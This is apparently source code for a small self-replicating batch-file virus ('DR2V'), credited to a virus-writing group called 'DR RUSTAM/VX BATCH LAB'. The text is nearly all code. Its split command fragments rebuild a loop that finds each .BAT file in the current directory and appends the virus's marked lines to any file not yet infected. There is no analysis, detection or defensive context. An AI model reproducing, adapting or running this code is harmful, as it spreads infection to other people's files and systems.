-----------------| DR2V | VIRUS -P |-----------------------
            
--------%<------------------------------
@ECHO %DR2V% OFF>NUL&SET W="%0"
CALL :DR2VV FO BB SE I D
EXIT %DR2V% 
:DR2VV
%1R %%W %4N (*.%2T) %5O %3T DR2VX="%%W"&CALL :DR2V %DR2VX% IND DR2V
GOTO :EOF %DR2V% 
:DR2V
F%2 "%3" <%DR2VX%>NUL
ECHO.%DR2V%>>%DR2VX%
IF ERRORLEVEL 1 F%2 "%3" <%W%>>%DR2VX%
--------%<------------------------------
========================================================


====-------=-==-===-----==
| DR RUSTAM/VX BATCH LAB |
====--=-====-----=-=-====-